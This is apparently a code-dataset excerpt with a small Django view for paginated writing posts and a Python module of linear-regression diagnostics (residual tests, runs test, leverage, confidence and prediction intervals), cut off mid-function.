content stringlengths 5 1.05M |
|---|
from django.shortcuts import render, get_object_or_404
from django.core.paginator import Paginator
from general_models.models import GeneralModel
def writing_home(request):
    """Render the writing index page with published posts, 5 per page."""
    posts_qs = (GeneralModel.objects
                .order_by('-publish_date')
                .filter(is_published=True, category='writing'))
    page_number = request.GET.get('page')
    page_obj = Paginator(posts_qs, 5).get_page(page_number)
    return render(request, 'writing/writing.html', {
        'title': 'Writing',
        'posts': page_obj,
    })
|
from matplotlib import pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
import scipy.stats as stats
import statsmodels.api as sm
import statsmodels.stats.api as sms
import statsmodels.formula.api as smf
import statsmodels.stats.multicomp as smm
import statsmodels.stats.outliers_influence as sso
import statsmodels
import statistics
import math
import time
import itertools
from scipy.optimize import curve_fit
from statsmodels.tsa.ar_model import AutoReg, ar_select_order
from statsmodels.tsa.api import acf, pacf, graphics
# compute p value from t statistics
def tpv (stat, dof, tail):
    """Convert a t statistic into a p-value.

    stat: t statistic; dof: degrees of freedom.
    tail: 'r' (right), 'l' (left), or 'db' (two-sided).
    Returns the p-value, or -1 for an unrecognized tail spec.
    """
    cdf = stats.t.cdf(stat, df = dof)
    if tail == 'r':
        return 1 - cdf
    if tail == 'l':
        return cdf
    if tail == 'db':
        # two-sided: double the smaller tail area
        return 2 * min(cdf, 1 - cdf)
    return -1  # error sentinel, kept for caller compatibility
# p value interpretation
def pvSig (pv):
    """Print a four-level significance interpretation for a p-value.

    The selected level is marked with '>>>'. Non-numeric input (NaN)
    falls through every comparison and prints BAD INPUT.
    """
    print("\n====== p value significance ======")
    if pv > 0.1:
        print(" highly sig, overwhelming evidence\n sig, strong evidence\n not sig, weak evidence\n>>> not sig, little to no evidence")
    elif pv > 0.05:
        print(" highly sig, overwhelming evidence\n sig, strong evidence\n>>> not sig, weak evidence\n not sig, little to no evidence")
    elif pv > 0.01:
        print(" highly sig, overwhelming evidence\n>>> sig, strong evidence\n not sig, weak evidence\n not sig, little to no evidence")
    elif pv <= 0.01:
        print(">>> highly sig, overwhelming evidence\n sig, strong evidence\n not sig, weak evidence\n not sig, little to no evidence")
    else:
        print("BAD INPUT")
    print("===================================\n")
# r value interpretation
def rvInter (rv):
    """Print a sign and strength interpretation for a correlation coefficient.

    rv: correlation coefficient, expected in [-1, 1]. Prints only; for
    rv == 0 (or NaN) the strength table is skipped entirely.
    """
    print("\n====== R value interpretation ======")
    if (rv > 0):
        print(" [positive]")
    elif (rv <0):
        print(" [negative]")
    else:
        # zero (or NaN): no direction, so there is no strength to report
        print(" [no linear relation]")  # fixed typo: was "rellation"
        return
    # strength buckets by |rv|; selected row marked with '>>>'
    if (abs(rv) <= 0.25):
        print(" very strong\n moderately strong\n moderately weak\n>>> very weak")
    elif (abs(rv) <= 0.5 and abs(rv) > 0.25):
        print(" very strong\n moderately strong\n>>> moderately weak\n very weak")
    elif (abs(rv) <= 0.75 and abs(rv) > 0.5):
        print(" very strong\n>>> moderately strong\n moderately weak\n very weak")
    elif (abs(rv) <= 1 and abs(rv) > 0.75):
        print(">>> very strong\n moderately strong\n moderately weak\n very weak")
    else:
        print("BAD INPUT")
    print("====================================\n")
def simple_regplot(df, xname, yname):
    """Scatter plot of yname vs xname with a seaborn OLS fit line (no CI band)."""
    sns.regplot(x = xname, y = yname, data = df, color = 'b', ci = None)
    plt.title('Scatter Plot')
    plt.xlabel(xname)
    plt.ylabel(yname)
    plt.show()
def simple_regmod(df, xname, yname):
    """Fit the simple OLS regression `yname ~ xname` and print the summary
    plus the estimated equation y = b0 + b1*x.
    """
    # Fit regression model
    result1 = smf.ols(yname + '~ ' + xname, data = df).fit()
    # Inspect the results
    print(result1.summary())
    # result1.params is a label-indexed Series; integer-position access via
    # params[0] is deprecated in pandas — use .iloc explicitly.
    b1_1 = result1.params.iloc[1]
    b0_1 = result1.params.iloc[0]
    print(f"Estimated model: y = {b0_1:.4f} + {b1_1:.4f} x")
def simple_durbin_watson(df, xname, yname, alpha = 0.05):
    """Fit yname on xname by OLS and print a hand-computed Durbin-Watson
    statistic d = sum((e_i - e_{i-1})^2) / sum(e_i^2), where e are the
    standardized residuals from statsmodels' summary table.
    """
    print("\n\n========== Durbin-Watson ==========\n")
    response = df[yname]
    predictor = pd.DataFrame({xname: np.asarray(df[xname]).T})
    design = sm.add_constant(predictor)
    fit = sm.OLS(response, design).fit()
    st, data, ss2 = sso.summary_table(fit, alpha = alpha)
    print("Columns in data are: %s" % ss2)
    # Predicted value (kept for parity with the original, unused below)
    y_pre = data[:, 2]
    # Studentized Residual
    resid = data[:, 10]
    denom = np.vdot(resid, resid)
    print("x_square_sum = ", denom)
    count = resid.size
    print("size = ", count)
    diffs = np.zeros((count))
    print("x_d = ", diffs)
    # successive differences; diffs[0] stays 0 by construction
    diffs[1:] = resid[1:] - resid[:-1]
    print("x_d = ", diffs)
    d = np.vdot(diffs, diffs) / denom
    print("d = ", d)
def chi2_normtest (stand_res, N, alpha = 0.05):
    """Chi-squared goodness-of-fit test of normality on standardized residuals.

    stand_res: array of standardized residuals.
    N: number of equal-probability bins.
    alpha: significance level for the printed critical value.
    Returns the chi-squared p-value, or None when the rule of five
    (every expected frequency >= 5) is not met.

    Bug fix: the original fell through to `return chi_pval` even when the
    rule of five failed, raising UnboundLocalError.
    """
    m = np.mean(stand_res)
    s = np.std(stand_res)
    # equal-probability bin edges mapped back to the residual scale,
    # clamped to +-4 at the extremes
    prob_bins = np.arange(N + 1) / N
    z_bins = np.empty(N + 1)
    z_bins[0] = -4
    z_bins[N] = 4
    for j in range(1, N):
        z_bins[j] = m + stats.norm.isf(1 - prob_bins[j]) * s
    counts, bins = np.histogram(stand_res, bins=z_bins)
    nobs = counts.sum()
    prob_e = np.diff(prob_bins)
    freq_e = nobs * prob_e
    freq_o = counts
    if np.sum(freq_e < 5) > 0:
        print("Rule of five is not met.")
        return None
    chi_stat, pval = stats.chisquare(freq_o, freq_e)
    # re-derive the p-value with N - 3 dof (two estimated params + 1)
    chi_pval = stats.chi2.sf(chi_stat, N - 3)
    print("Chi-squared test: statistics = %0.4f, p-value = %0.4f" % (chi_stat, chi_pval))
    df = freq_o.shape[0]-3
    crit_value = stats.chi2.ppf(1 - alpha, df)
    print("Critical value = %0.4f (degree of freedom = %d)" % (crit_value, df))  # fixed "defree" typo
    return chi_pval
def runsTest(l, l_median):
    """Wald-Wolfowitz runs test for randomness around l_median.

    l: sequence of values; l_median: reference value splitting it into
    'high' (>= median) and 'low' runs. Returns the two-sided normal
    p-value. Raises ZeroDivisionError if all values fall on one side
    (stan_dev is then 0), as in the original.

    Bug fixes vs. the original: the loop started at i = 0, so l[-1]
    (Python wrap-around) was compared against l[0], and l[0] was counted
    twice in n1/n2.
    """
    runs, n1, n2 = 1, 0, 0
    # classify the first observation; it starts the first run
    if(l[0]) >= l_median:
        n1 += 1
    else:
        n2 += 1
    for i in range(1, len(l)):
        # a run boundary is a sign change relative to the median
        if (l[i] >= l_median) != (l[i-1] >= l_median):
            runs += 1
        # count positives / negatives exactly once each
        if(l[i]) >= l_median:
            n1 += 1
        else:
            n2 += 1
    runs_exp = ((2*n1*n2)/(n1+n2)) + 1
    stan_dev = math.sqrt((2*n1*n2*(2*n1*n2-n1-n2))/(((n1+n2)**2)*(n1+n2-1)))
    z = (runs-runs_exp)/stan_dev
    pval_z = stats.norm.sf(abs(z)) * 2
    print('runs = ', runs)
    print('n1 = ', n1)
    print('n2 = ', n2)
    print('runs_exp = ', runs_exp)
    print('stan_dev = ', stan_dev)
    print('z = ', z)
    print('pval_z = ', pval_z)
    return pval_z
def simple_residual(df, xname, yname, alpha = 0.05, resd_all = False, nobins = 6):
    """Full residual diagnostics for the simple regression `yname ~ xname`.

    Prints and plots, in order: residual summary, error-normality checks
    (histogram, Shapiro, chi-squared), a standardized-residual plot
    (homoscedasticity), a runs test (error dependence), outliers with
    |standardized residual| > 2, and high-leverage observations.

    df: DataFrame holding the xname and yname columns.
    alpha: significance level forwarded to statsmodels' summary table.
    resd_all: when True, also print the raw residual arrays.
    nobins: histogram bin count, reused as chi-squared bin count and in
        the leverage cutoff below.
    """
    print("\n\n----------------------------\n|Residual Analysis - simple|\n----------------------------\n")
    print("using alpha = ", alpha)
    print("\n\n ◆ Residuals\n")
    # Fit regression model
    result = smf.ols(yname + '~' + xname, data = df).fit()
    # studentized residual: summary_table column 8 = raw residual,
    # column 10 = standardized residual
    st1, data1, ss3 = sso.summary_table(result, alpha = alpha)
    Residual = data1[:, 8]
    STD_Residual = data1[:,10]
    mu = np.mean(STD_Residual)
    sigma = np.std(STD_Residual)
    if(resd_all == True):
        print("Original Residuals: \n", Residual, "\n")
        print("Standardized Residuals: \n", STD_Residual, "\n")
        print("mu:", mu)
        print("sigma:", sigma)
    else:
        print("mu:", mu)
        print("sigma:", sigma)
    # Normality Test
    print("\n\n ◆ Error Normality Test\n")
    print("H0: Errors are normally distributed.")
    print("H1: Errors are not normally distributed.")
    # Histogram
    print("\n\n ◇ Histogram\n")
    counts, bins, patches = plt.hist(STD_Residual, nobins, density = False, facecolor = 'black', alpha = 0.75)
    plt.xlabel('Standardized Residuals')
    plt.ylabel('Frequency')
    plt.title('Histogram of Standardized Residuals')
    plt.grid(True)
    # bin midpoints (computed but only the counts/edges are printed)
    bin_centers = [np.mean(k) for k in zip(bins[:-1], bins[1:])]
    plt.show()
    print(counts)
    print(bins)
    # Shapiro Test
    print("\n\n ◇ Shapiro Test\n")
    stat, spv = stats.shapiro(STD_Residual)
    print(f"Statistics = {stat:.4f}, p-value = {spv:.4f}")
    pvSig(spv)
    # Chi^2 Test: equal-probability bins on the residual scale,
    # outer edges clamped to +-4 standard deviations
    print("\n\n ◇ Chi-squared Test\n")
    stand_res = STD_Residual
    N = nobins
    m = np.mean(stand_res)
    s = np.std(stand_res)
    prob_bins = np.zeros((N + 1))
    z_bins = np.zeros((N + 1))
    z_bins[0] = -4
    z_bins[N] = 4
    for i in range(0, N+1):
        prob_bins[i] = i/N
    for j in range(1, N):
        z_bins[j] = m + stats.norm.isf(1 - prob_bins[j]) * s
    counts, bins = np.histogram(stand_res, bins=z_bins)
    nobs = counts.sum()
    prob_e = np.zeros((N))
    for i in range(1, N+1):
        prob_e[i - 1] = prob_bins[i] - prob_bins[i - 1]
    freq_e = nobs * prob_e
    freq_o = counts
    if np.sum(freq_e < 5) > 0:
        # rule of five: chi-squared approximation unreliable, test skipped
        print("Rule of five is not met.")
    else:
        chi_stat, pval = stats.chisquare(freq_o, freq_e)
        # p-value re-derived with N - 3 degrees of freedom
        chi_pval = stats.chi2.sf(chi_stat, N - 3)
        print("Chi-squared test: statistics = %0.4f, p-value = %0.4f" % (chi_stat, chi_pval))
        df_fq = freq_o.shape[0]-3
        crit_value = stats.chi2.ppf(1 - alpha, df_fq)
        # NOTE(review): "defree" is a typo for "degree" in the output string
        print("Critical value = %0.4f (defree of freedom = %d)" % (crit_value, df_fq))
        #pvSig(chi_pval)
    # Homoscedasticity and Heteroscedasticity: residuals vs observation id,
    # with +-2 reference lines
    print("\n\n ◆ Homoscedasticity and Heteroscedasticity\n")
    print("H_0: Randomness exists")
    print("H_1: Randomness doesn't exist")
    Id1 = data1[:, 0]
    plt.plot(Id1, STD_Residual, 'o', color = 'gray')
    plt.axhline(y=0, color = 'blue')
    plt.axhline(y=2, color = 'red')
    plt.axhline(y=-2, color = 'red')
    plt.title('Standardized Residual Plot')
    plt.xlabel('Observation No.')
    plt.ylabel('Standardized Residual')
    plt.show()
    # Dependence of the Error Variable
    print("\n\n ◆ Dependence of the Error Variable (Run Test)\n")
    print("H_0: Sample is random")
    print("H_1: Sample is not random")
    SD_median = statistics.median(STD_Residual)
    Z_pval = runsTest(STD_Residual, SD_median)
    print('p-value for run test z-statistic= ', Z_pval)
    pvSig(Z_pval)
    # Outliers: |standardized residual| > 2
    print("\n\n ◆ Outliers Finding\n")
    print("(remove by yourself!)\n")
    df_out = pd.DataFrame(STD_Residual, columns = ['SD'])
    filter = (df_out['SD'] < -2) | (df_out['SD'] > 2)
    print("Outliers by SD = ")
    print(df_out['SD'].loc[filter])
    print("\nActual ID: ", df_out['SD'].loc[filter].index+1)
    # Influential Observations via leverage h_i for simple regression:
    # h_i = 1/n + (x_i - x_bar)^2 / ((n-1) * s_x^2)
    print("\n\n ◆ Influential observations Finding\n")
    x_data = df[xname].values
    y_data = df[yname].values
    cov_mat1 = np.cov(y_data, x_data)
    x_data_bar = x_data.mean()
    data_nobs = len(x_data)
    h_val = 1 / data_nobs + (x_data - x_data_bar) ** 2 / (data_nobs - 1) / cov_mat1[1,1]
    # print(h_val)
    df_hi = pd.DataFrame(h_val, columns = ['hi'])
    # NOTE(review): cutoff reuses `nobins` (histogram bin count); the usual
    # leverage cutoff is 3*(k+1)/n — confirm whether nobins/n was intended.
    filter = (df_hi['hi'] > nobins / data_nobs )
    print("Influential Observations by hi = ", df_hi['hi'].loc[filter])
    print("\nAutal ID: ", df_hi['hi'].loc[filter].index+1)
def simple_modass(df, xname, yname, alpha = 0.05, tail = 'db'):
    """Assess the fitted simple regression `yname ~ xname`.

    Prints the standard error of estimate (and its size relative to the
    mean of y), R^2 / R with interpretation, a t test on the slope
    (tail spec forwarded to tpv), and the correlation coefficient test.
    """
    # Fit regression model
    result1 = smf.ols(yname + '~ ' + xname, data = df).fit()
    b1_1 = result1.params[1]  # slope
    b0_1 = result1.params[0]  # intercept
    print(f"Estimated model: y = {b0_1:.4f} + {b1_1:.4f} x")
    print("\n\n---------------------------\n| Model Assessing |\n---------------------------\n")
    print("using alpha = ", alpha)
    print("\n\n ◆ Standard Error of Estimate\n")
    s2_e = result1.mse_resid
    print(f"MSE = {s2_e:f}")
    s_e = result1.mse_resid ** 0.5
    print(f"Standard errors = {s_e:f}")
    y_bar = df[yname].mean()
    print(f"y mean = {y_bar:.4f}")
    print(f"The absolute value of standard errors is about {abs(s_e/y_bar)*100:.0f}% of mean of independent variables.\n")
    print("\n\n ◆ Coefficient of Determination\n")
    R2 = result1.rsquared
    print(f"R^2 = {R2:f}")
    # R carries the sign of the estimated slope
    R = np.sign(b1_1) * R2 ** 0.5
    print(f"R = {R:f}")
    print(f"\nR^2 value interpretation\nAbout {R2*100:.0f}% of the variation in the dependent variables is explained by independent ones, the rest remains unexplained.")
    rvInter(R)
    # NOTE(review): "Studetn" is a typo for "Student" in the output string
    print("\n\n ◆ Studetn-t test for beta1(slope)\n")
    dof = len(df) - 2
    # NOTE(review): this uses dof - 2 = n - 4 inside the statistic and the
    # critical values, while the correlation test below uses n - 2; one of
    # the two is presumably off — confirm which dof was intended.
    tv = R * ((dof - 2)/(1 - R ** 2)) ** 0.5
    LCL = stats.t.ppf(alpha / 2, dof - 2)
    UCL = stats.t.ppf(1 - alpha / 2, dof - 2)
    print('t = ', tv)
    print('t_LCL = ', LCL)
    print('t_UCL = ', UCL)
    print(f"\np-value of t-stat tail: {tail}")
    tp = tpv(tv, dof, tail)
    print("p-value of t test = ", tp)
    pvSig(tp)
    print("\n\n ◆ Coefficient of Correlation\n")
    cor_mat = np.corrcoef(df[[xname, yname]].values, rowvar = False)
    n = df.shape[0]
    r = cor_mat[1,0]
    # t statistic for H0: rho = 0, with n - 2 degrees of freedom
    tv_cc = r * ((n-2)/(1 - r**2)) ** 0.5
    # NOTE(review): 0.975 hard-codes a two-sided 5% level; `alpha` is not
    # used here — confirm whether 1 - alpha/2 was intended.
    t_critical = stats.t.ppf(0.975, n - 2)
    pval = stats.t.sf(np.abs(tv_cc), n - 2)*2
    print('r = ', r)
    print('t_critical = ', t_critical)
    print('t = ', tv_cc)
    print('p_value = ', pval)
def simple_CIPIPRE (x, y, x1, alpha = 0.05):
    """Print the confidence interval for the mean response and the
    prediction interval for an individual response at x = x1, for the
    simple regression of y on x.

    x, y: 1-D data arrays/Series. x1: scalar point of prediction.
    alpha: significance level (intervals are at 100*(1-alpha)%).
    """
    print("\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n|CI PI for simple regression|\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n")
    print("using alpha = ", alpha)
    x_new = np.array([1, x1])  # design row [intercept, x1]
    print("make Confidence Interval and Prediction Interval predictions at mean of x = ", x1)
    x2 = sm.add_constant(x)
    olsmod = sm.OLS(y, x2)
    result_reg = olsmod.fit()
    y_head = np.dot(result_reg.params, x_new)
    print("y_head = ", y_head)
    # Pass the confidence level positionally: the keyword was renamed from
    # `alpha` to `confidence` in SciPy 1.9 and the old name later removed,
    # so `alpha=` breaks on current SciPy.
    (t_minus, t_plus) = stats.t.interval(1.0 - alpha, df = result_reg.df_resid )
    cov_mat1 = np.cov(y, x)
    x_bar = x.mean()
    # core1: s.e. factor for the mean response; core2 adds the extra "1"
    # for an individual prediction
    core1 = (1 / result_reg.nobs + (x1 - x_bar) ** 2 / (result_reg.nobs - 1) / cov_mat1[1,1] ) ** 0.5
    core2 = (1 + 1 / result_reg.nobs + (x1 - x_bar) ** 2 / (result_reg.nobs - 1) / cov_mat1[1,1] ) ** 0.5
    lower_bound = y_head + t_minus * (result_reg.mse_resid ** 0.5) * core1
    upper_bound = y_head + t_plus * (result_reg.mse_resid ** 0.5) * core1
    half_interval = t_plus * (result_reg.mse_resid ** 0.5) * core1
    lower_bound2 = y_head + t_minus * (result_reg.mse_resid ** 0.5) * core2
    upper_bound2 = y_head + t_plus * (result_reg.mse_resid ** 0.5) * core2
    half_interval2 = t_plus * (result_reg.mse_resid ** 0.5) * core2
    print(f"\n{100*(1-alpha):.0f}% confidence interval for mean: [{lower_bound:.4f}, {upper_bound:.4f}], or {y_head:.4f} +- {half_interval:.4f}")
    print(f"\n{100*(1-alpha):.0f}% prediction interval: [{lower_bound2:.4f}, {upper_bound2:.4f}], or {y_head:.4f} +- {half_interval2:.4f}")
def simple_CIPIINT_regplot(df, xname, yname, alpha = 0.05):
    """Plot the data, the fitted simple-regression line, and the
    confidence (red) and prediction (blue dashed) interval bands."""
    print("\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n|CI PI Interval plot - simple|\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n")
    print("using alpha = ", alpha)
    ordered = df.sort_values([xname])
    fit = smf.ols(yname + '~' + xname, data = ordered).fit()
    xs = ordered[xname].values
    ys = ordered[yname].values
    st, data, ss2 = sso.summary_table(fit, alpha = alpha)
    fitted = data[:, 2]
    ci_low, ci_upp = data[:, 4:6].T
    pi_low, pi_upp = data[:, 6:8].T
    plt.plot(xs, ys, 'o', color = 'gray')
    plt.plot(xs, fitted, '-', lw=0.5)
    plt.plot(xs, ci_low, 'r-', lw=0.4)
    plt.plot(xs, ci_upp, 'r-', lw=0.4)
    plt.plot(xs, pi_low, 'b--', lw=0.4)
    plt.plot(xs, pi_upp, 'b--', lw=0.4)
    plt.title('CI PI plot')
    plt.xlabel(xname)
    plt.ylabel(yname)
    plt.legend(['data points', 'regression model', 'confidence interval', 'prediction interval'], title = 'Legends', bbox_to_anchor = (1.3, 1), prop={'size': 6})
    plt.show()
def simple(step, df, xname, yname, alpha = 0.05, tail = 'db', nobins = 6, resd_all = False):
    """Run one numbered step of the simple-regression workflow (1-8).

    Unknown step values print an error message.
    """
    if step == 1:
        simple_regplot(df, xname, yname)
        return
    if step == 2:
        print("\npropose a statistical model\n")
        return
    if step == 3:
        simple_regmod(df, xname, yname)
        return
    if step == 4:
        print("\nfor autocorrelation and others, please determine by yourself!\n")
        simple_durbin_watson(df, xname, yname, alpha = alpha)
        return
    if step == 5:
        print("\nremember to remove outliers or do some modifications.\n")
        simple_residual(df, xname, yname, alpha = alpha, resd_all = resd_all, nobins = nobins)
        return
    if step == 6:
        simple_modass(df, xname, yname, alpha = alpha, tail = tail)
        return
    if step == 7:
        print("\ninterpretation\n")
        return
    if step == 8:
        print("\nsimple_CIPIPRE(df[xname], df[yname], x_input...) won't run here\n")
        simple_CIPIINT_regplot(df, xname, yname, alpha = alpha)
        return
    print("\nbad input for step!\n")
def multiple_regplot(df, xnames, yname):
    """Draw one regression scatter plot of yname against each predictor in
    xnames, then a correlation heatmap over [yname] + xnames."""
    target = df[yname].values
    for predictor in xnames:
        sns.regplot(x = df[predictor].values, y = target, data = df, color = 'b', ci = None)
        plt.xlabel(predictor)
        plt.ylabel(yname)
        plt.show()
    corr_matrix = df[[yname] + xnames].corr()
    sns.heatmap(corr_matrix, annot = True)
def multiple_modpropose(xnames, yname):
    """Print a LaTeX-flavored model proposal for a multiple regression of
    yname on the variables in xnames (with <br> markers for HTML)."""
    print("\n\n---------- Model Proposal ----------\n")
    print("Model proposal,<br>")
    terms = "".join("\\beta_" + str(i + 1) + "x_" + str(i + 1) + " + " for i in range(len(xnames)))
    print("$y = \\beta_0 + " + terms + "\\epsilon$<br>")
    print("where y is ", yname, "<br>")
    descriptions = "".join("$x_" + str(j + 1) + "$ is " + xnames[j] + ", " for j in range(len(xnames)))
    print("and " + descriptions)
def multiple_regmod(df, xnames, yname, alpha = 0.05):
    """Fit the multiple OLS regression of yname on xnames, print the
    summary and the estimated equation with signed coefficients.
    """
    y_data = df[yname]
    # assemble the design matrix column by column, preserving xnames order
    x_data_ar = np.asarray([df[name] for name in xnames])
    x_data = pd.DataFrame(x_data_ar.T, columns = xnames)
    x_data2 = sm.add_constant(x_data)
    result = sm.OLS(y_data, x_data2).fit()
    print(f"\n\nusing alpha = {alpha:.2f}")
    print(result.summary())
    # result.params is label-indexed; positional access via params[0] is
    # deprecated in pandas — use .iloc explicitly.
    print("\nEstimated model: y = %0.4f" % (result.params.iloc[0]), end = ' ')
    for c, x in zip(result.params.iloc[1:], list(range(1, len(xnames) + 1))):
        print('+', end = '') if c > 0 else print('-', end = '')
        print(" %0.4f x%d " % (abs(c), x), end = '')
def multiple_durbin_watson(df, xnames, yname, alpha = 0.05):
    """Fit yname on xnames by OLS and print a hand-computed Durbin-Watson
    statistic d = sum((e_i - e_{i-1})^2) / sum(e_i^2), where e are the
    standardized residuals from statsmodels' summary table.
    """
    print("\n\n========== Durbin-Watson ==========\n")
    response = df[yname]
    cols = np.asarray([df[name] for name in xnames])
    design = sm.add_constant(pd.DataFrame(cols.T, columns = xnames))
    fit = sm.OLS(response, design).fit()
    st, data, ss2 = sso.summary_table(fit, alpha = alpha)
    print("Columns in data are: %s" % ss2)
    # Predicted value (kept for parity with the original, unused below)
    y_pre = data[:, 2]
    # Studentized Residual
    resid = data[:, 10]
    denom = np.vdot(resid, resid)
    print("x_square_sum = ", denom)
    count = resid.size
    print("size = ", count)
    diffs = np.zeros((count))
    print("x_d = ", diffs)
    # successive differences; diffs[0] stays 0 by construction
    diffs[1:] = resid[1:] - resid[:-1]
    print("x_d = ", diffs)
    d = np.vdot(diffs, diffs) / denom
    print("d = ", d)
def multiple_residual(df, xnames, yname, alpha = 0.05, nobins = 6):
    """Full residual diagnostics for the multiple regression of yname on xnames.

    Prints and plots, in order: error-normality checks (histogram, QQ-plot,
    Shapiro, chi-squared), a standardized-residual-vs-fitted plot
    (homoscedasticity), a runs test (error dependence), outliers with
    |standardized residual| > 2, and influential observations by hat-matrix
    leverage and Cook's distance.

    Side effect: adds an 'hii' column to df.
    """
    print("\n\n----------------------------\n|Residual Analysis - multiple|\n----------------------------\n")
    print("using alpha = ", alpha)
    print("\n\n ◆ Residuals\n")
    y_data = df[yname]
    # assemble the design matrix column by column, preserving xnames order
    x_data_ar = []
    for i in range(len(xnames)):
        x_data_ar.append(df[xnames[i]])
    x_data_ar = np.asarray(x_data_ar)
    x_data_T = x_data_ar.T
    x_data = pd.DataFrame(x_data_T, columns = xnames)
    x_data2 = sm.add_constant(x_data)
    olsmod = sm.OLS(y_data, x_data2)
    result = olsmod.fit()
    # summary_table column 2 = fitted value, column 10 = standardized residual
    st, data, ss2 = sso.summary_table(result, alpha = alpha)
    print("Columns in data are: %s" % ss2)
    # Predicted value
    y_pre = data[:, 2]
    # Studentized Residual
    SD = data[:, 10]
    mu = np.mean(SD)
    sigma = np.std(SD)
    # Normality Test
    print("\n\n ◆ Error Normality Test\n")
    print("H0: Errors are normally distributed.")
    print("H1: Errors are not normally distributed.")
    # Histogram
    print("\n\n ◇ Histogram\n")
    fig, ax = plt.subplots()
    counts, bins, patches = plt.hist(SD, nobins, density=False, facecolor='g', alpha=0.75)
    plt.xlabel('Standardized Residuals')
    plt.ylabel('Frequency')
    # NOTE(review): title mentions "Car Prices" — looks like a leftover from
    # the dataset this was first written for; confirm before reuse.
    plt.title('Histogram of Standardized Residuals_Car Prices')
    plt.grid(True)
    # bin midpoints (computed but only the counts/edges are printed)
    bin_centers = [np.mean(k) for k in zip(bins[:-1], bins[1:])]
    plt.show()
    print(counts)
    print(bins)
    # qqplot
    print("\n\n ◇ QQ-plot\n")
    fig = sm.qqplot(SD, stats.norm, fit = True, line = '45')
    plt.show()
    print()
    # Shapiro Test
    print("\n\n ◇ Shapiro Test\n")
    stat, spv = stats.shapiro(SD)
    print(f"Statistics = {stat:.4f}, p-value = {spv:.4f}")
    pvSig(spv)
    # Chi^2 Test: equal-probability bins on the residual scale, outer edges
    # clamped to +-4 standard deviations.
    # NOTE(review): here N = nobins - 1 whereas simple_residual uses
    # N = nobins — confirm the off-by-one is intentional.
    print("\n\n ◇ Chi-squared Test\n")
    stand_res = SD
    N = nobins - 1
    m = np.mean(stand_res)
    s = np.std(stand_res)
    prob_bins = np.zeros((N + 1))
    z_bins = np.zeros((N + 1))
    z_bins[0] = -4
    z_bins[N] = 4
    for i in range(0, N+1):
        prob_bins[i] = i/N
    for j in range(1, N):
        z_bins[j] = m + stats.norm.isf(1 - prob_bins[j]) * s
    counts, bins = np.histogram(stand_res, bins=z_bins)
    nobs = counts.sum()
    prob_e = np.zeros((N))
    for i in range(1, N+1):
        prob_e[i - 1] = prob_bins[i] - prob_bins[i - 1]
    freq_e = nobs * prob_e
    freq_o = counts
    if np.sum(freq_e < 5) > 0:
        # rule of five: chi-squared approximation unreliable, test skipped
        print("Rule of five is not met.")
    else:
        chi_stat, pval = stats.chisquare(freq_o, freq_e)
        # p-value re-derived with N - 3 degrees of freedom
        chi_pval = stats.chi2.sf(chi_stat, N - 3)
        print("Chi-squared test: statistics = %0.4f, p-value = %0.4f" % (chi_stat, chi_pval))
        df_fq = freq_o.shape[0]-3
        crit_value = stats.chi2.ppf(1 - alpha, df_fq)
        # NOTE(review): "defree" is a typo for "degree" in the output string
        print("Critical value = %0.4f (defree of freedom = %d)" % (crit_value, df_fq))
        #pvSig(chi_pval)
    # Homoscedasticity and Heteroscedasticity: residuals vs fitted values
    print("\n\n ◆ Homoscedasticity and Heteroscedasticity\n")
    print("H_0:Randomness exists")
    # NOTE(review): the next line presumably meant "H_1:" — typo in output
    print("H_0:Randomness doesn't exist")
    st, data, ss2 = sso.summary_table(result, alpha = alpha)
    print("\nColumns in data are: %s" % ss2)
    # Predicted value
    y_pre = data[:, 2]
    # Studentized Residual
    SD = data[:, 10]
    plt.plot(y_pre, SD, 'o', color = 'gray')
    plt.axhline(y=2, color = 'red', lw = 0.8)
    plt.axhline(y=0, color = 'blue')
    plt.axhline(y=-2, color = 'red', lw = 0.8)
    plt.title('Standardized Residual Plot')
    plt.xlabel('Predicted y value')
    plt.ylabel('Standardized Residual')
    plt.show()
    ##### autocorrelation
    # Dependence of the Error Variable
    print("\n\n ◆ Dependence of the Error Variable (Run Test)\n")
    print("H_0: Sample is random")
    print("H_1: Sample is not random")
    print("\nColumns in data are: %s" % ss2)
    Id1 = data[:, 0]
    plt.plot(Id1, SD, 'o', color = 'gray')
    plt.axhline(y=0, color = 'blue')
    plt.axhline(y=2, color = 'red')
    plt.axhline(y=-2, color = 'red')
    plt.title('Standardized Residual Plot')
    plt.xlabel('Observation No.')
    plt.ylabel('Standardized Residual')
    plt.show()
    SD_median = statistics.median(SD)
    Z_pval = runsTest(SD, SD_median)
    print('p_value for Z-statistic= ', Z_pval)
    pvSig(Z_pval)
    # Outliers: |standardized residual| > 2
    print("\n\n ◆ Outliers Finding\n")
    df_out = pd.DataFrame(SD, columns = ['SD'])
    filter = (df_out['SD'] < -2) | (df_out['SD'] > 2)
    print("Outliers by SD = ")
    print(df_out['SD'].loc[filter])
    print("\nActual ID: ", df_out['SD'].loc[filter].index+1)
    ## Influential Observations by hii: leverage from the hat matrix
    ## H = X (X'X)^-1 X'
    print("\n\n ◆ Influential observations Finding by hii\n")
    x_data2 = np.array(x_data2)
    H = np.matmul(x_data2, np.linalg.solve(np.matmul(x_data2.T, x_data2), x_data2.T))
    df['hii'] = np.diagonal(H)
    df_1h = pd.DataFrame(df['hii'])
    k = result.df_model
    n = len(df_1h['hii'])
    # conventional leverage cutoff 3(k+1)/n
    h_level = 3 * (k+1) / n
    print("h_level = ", h_level)
    filter = (df_1h['hii'] > h_level)
    print("\nInfluential Observations by hi =\n")
    print(df_1h['hii'].loc[filter])
    # Influential Observations by Cook's Distance
    print("\n\n ◆ Influential observations Finding by Cook's Distance\n")
    s2_e = result.mse_resid
    k = result.df_model
    y_a = data[:, 1]
    y_f = data[:, 2]
    h_i = df['hii']
    # NOTE(review): the textbook Cook's distance divides by (k + 1), not
    # (k - 1) — confirm the intended formula.
    CD_arr = np.square(y_a - y_f) / s2_e / (k - 1) * h_i / np.square(1 - h_i)
    CD = np.array(CD_arr)
    df_cd = pd.DataFrame(CD,columns = ['CD'])
    print(df_cd.head())
    # common rule of thumb: D_i > 1 flags an influential observation
    filter = (df_cd['CD'] > 1 )
    print("Influential Observations by Cook's Distances =\n")
    print(df_cd['CD'].loc[filter])
def multiple_modass(df, xnames, yname, alpha = 0.05):
    """Assess the fitted multiple regression of yname on xnames.

